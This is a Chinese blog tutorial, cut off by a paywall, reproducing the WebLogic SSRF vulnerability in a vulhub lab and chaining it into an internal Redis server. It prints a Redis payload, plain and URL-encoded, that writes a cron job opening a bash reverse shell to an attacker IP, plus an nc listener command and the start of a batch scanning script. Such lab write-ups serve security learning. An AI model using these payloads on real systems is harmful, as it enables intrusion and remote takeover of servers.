SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell

已于 2022-03-17 20:42:57 修改
阅读量6.4k 收藏 13
点赞数 1
文章标签: redis 安全 服务器
于 2022-03-17 20:41:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43774222/article/details/123556061
版权

一、概述

SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。
主要攻击手段
1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;
2.攻击运行在内网或本地的应用程序(比如溢出);
3.对内网web应用进行指纹识别,通过访问默认文件实现;
4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli 等);
5.利用file协议读取本地文件等。

回显信息

在这里插入图片描述

二、ssrf漏洞复现

1.环境搭建
1.1下载解压vulhub到本地(漏洞路径:vulhub-master/weblogic/ssrf)
1.2在相应目录下使用 docker-compose up -d 命令调用yml脚本,便可以搭建好环境。
1.3访问: http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp 出现如下界面

在这里插入图片描述

2.验证漏洞是否存在
使用如下URL测试漏洞是否存在 
http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1

在这里插入图片描述

3.探测内网ip与端口

ip端口的探测主要分三种情况:
1.ip端口都存在
2.ip存在端口不存在
3.ip不存在

当ip端口都存在时,提示如下报错:(content-type可不同)

在这里插入图片描述

ip存在端口未开放时,提示如下报错:

在这里插入图片描述
ip不存在时提示如下报错:

在这里插入图片描述

4.攻击内网radis
4.1查看内网redis的ip地址 
docker exec -it ssrf_redis_1 ip addr

在这里插入图片描述

4.2探测是否开放6379端口

如下图所示,6379端口开放
在这里插入图片描述
4.3redis攻击脚本:(可以弹回一个shell)

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/反弹shell的ip地址/监听端口 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

使用ULR编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.x.x%2Fx%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

4.4在kali上使用nc进行监听

 nc -lvnp 4444

4.5在浏览器中进行漏洞利用

在这里插入图片描述
4.6kali中成功返回一个shell

在这里插入图片描述

三、相关脚本

1.使用方法

在这里插入图片描述

2.weblogic_ssrf漏洞批量检查脚本

2.1将域名保存在domain.txt文件中

图1
2.2运行脚本

在这里插入图片描述

# -*- coding: utf-8 -*-
# 功能:批量探测weblogic SSRF漏洞

import re
import Queue
import requests
import threading

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()
mutex = threading.Lock()

class Weblogic_SSRF_Check(threading.Thread):
    """docstring for Weblogic_SSRF_Check"""
最低0.47元/天 解锁文章
L0st1amb
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSRF攻击利用漏洞进行SSRF提权攻击实验参考
安全龙网络安全攻防实验室
11-04 1117
SSRF攻击是建立在文件包含、远程执行等高危漏洞,来进行内的权限提升攻击,通过SSRF来提升攻击的权限并将权限达到最大化; 本实验通过2个实验步骤介绍SSRF,并通过文件包含漏洞进行,fsockopen端口扫描与利用中间件redis提升权限写入可执行脚本文件的SSRF攻击EXP,用这2个实战来让大家熟悉SSRF攻击与利用。 EXP redis.txt 漏洞利用redis进行ssrf权限提...
漏洞——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 884
vulhubssrf漏洞
WebLogic SSRF漏洞攻击内Redis以及反弹shell
SoulCat
02-08 3391
WebLogic SSRF漏洞攻击内Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
vulhubweblogic ssrf漏洞
weixin_53730939的博客
03-19 629
vulhubweblogic ssrf漏洞(详解)
络安全——利用ssrf操作内redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3354
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
漏洞Weblogic SSRF漏洞
Miraitowax
02-22 926
Weblogic SSRF漏洞原理,漏洞步骤详细总结及剖析
SSRF02】服务器端请求伪造——WebLogic架构漏洞之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4058
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞进行内扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell
weblogicssrf漏洞_【漏洞】利用WebLogic SSRF漏洞攻击内Redis反弹shell
weixin_39820226的博客
12-22 216
0x01 环境公上存在WebLogic服务,存在SSRF漏洞中部署了一台Redis服务器,IP地址为172.21.0.2,端口6379反弹shell需要自己的公IP总计两个公IP,一个内IP0x02 WebLogic SSRF漏洞WebLogicSSRF漏洞算是一个比较知名的SSRF漏洞,具体原理可以自行谷歌。本篇主要是通过漏洞来加深对SSRF漏洞的理解。首先访问WebLo...
weblogic ssrf vulhub漏洞
weixin_51143375的博客
12-04 479
weblogic ssrf vulhub漏洞
WebLogic SSRF漏洞
11-25
WebLogic SSRF漏洞方法 CVE-2014-4210 10.0.2,10.3.6
通过SSRF操作Redis主从制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
Weblogic漏洞扫描工具
02-22
本篇将详细探讨"Weblogic漏洞扫描工具"的相关知识点,包括Weblogic漏洞类型、反序列化攻击、SSRF漏洞以及如何进行有效的漏洞扫描。 首先,我们要理解Weblogic的`console页面探测`。Weblogic Console是Weblogic...
国光的手把手带你用 SSRF 打穿内靶场源码.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发系统和应用的漏洞,并进行渗透测试,从而及时修和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内服务[+] 扫描内部络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
Redis与MySQL数据一致性问题的策略模式及解决方案
qq_36451127的博客
07-24 2250
(1)实际开发中一般使用使用了缓存更新策略模式,此方案最大程度上保证了数据的一致性并且实也最简单(2)无论是先操作数据库再删除缓存还是先删除缓存再操作数据库都有可能会出删除缓存失败的情况,所以需要加入删除重试机制(3)如果想要Redis和Mysql的数据强一致性,可以考虑使用加锁的方式实
外卖项目day08---店铺营业状态设置/用到redis
2301_79693537的博客
07-23 195
【代码】外卖项目day08---店铺营业状态设置/用到redis
Redisson中RQueue的使用场景附一个异步的例子
最新发布
qq_40592590的博客
07-24 933
redis
Redis 7.x 系列【29】集群原理之自动故障转移
记录知识、锤炼自我
07-24 959
Redis 集群的某些节点出故障时,可以自动进行故障转移,地将从节点提升为主节点,保证服务的连续性和数据的可用性。
vulhub weblogic ssrf
08-31
您好!要在vulhubWebLogicSSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的代码库。您可以在GitHub上找到vulhub的代码库,并使用git命令将其克隆到本地。 3. 进入vulhub目录并找到weblogic/ssrf目录。在这个目录中,您将找到一个docker-compose.yml文件,其中包含了启动WebLogic容器所需的配置信息。 4. 根据您的需求编辑docker-compose.yml文件。您可以修改端口映射、环境变量等配置信息。确保您将容器的访问端口映射到主机的某个端口,以便在浏览器中访问。 5. 启动WebLogic容器。通过运行以下命令启动WebLogic容器:`docker-compose up -d`。这会启动WebLogic容器,并将其与您在docker-compose.yml文件中配置的端口进行关联。 6. 访问WebLogic控制台。打开您喜欢的浏览器,并访问`http://localhost:7001/console`(假设您将容器的访问端口映射到了7001端口)。这将打开WebLogic控制台。 7. 在WebLogic控制台中,尝试进行SSRF漏洞。您可以根据具体的漏洞利用方法进行操作。请注意,漏洞利用方法可能因不同的漏洞而异,具体的步骤可能因您选择的漏洞而有所不同。 请确保在进行任何漏洞前,了解所使用的漏洞的影响和风险,并在合法授权范围内进行测试。此外,建议仅在安全实验室环境中进行漏洞,避免对未经授权的系统造成任何伤害。 希望这些步骤对您有帮助!如需进一步了解,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值